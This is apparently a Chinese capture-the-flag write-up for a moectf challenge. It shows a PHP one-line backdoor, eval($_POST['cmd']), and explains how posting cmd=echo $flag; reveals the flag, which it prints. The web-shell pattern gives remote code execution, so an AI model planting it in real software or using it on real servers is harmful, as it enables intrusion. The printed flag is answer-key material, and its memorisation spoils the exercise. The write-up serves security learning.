题目:
听说有很多带黑阔喜欢使用这个函数留后门,你也来试试?
题目地址:http://39.108.11.206:10006
打开链接,给了一串php代码
<?php error_reporting(0); $flag="xxxxxxxxxxxxxxxxxxxx"; eval($_POST['cmd']); ?>
$_POST[‘posha’]);是获取post变量
而eval是一个php函数,他可以将字符串中的符合php语法的字符当做php代码进行执行
echo $flag; 输出flag参数
使用post接口测试工具 cmd= echo $flag;提交参数,得到flag:
moectf{eVa1_1s_aMazinG}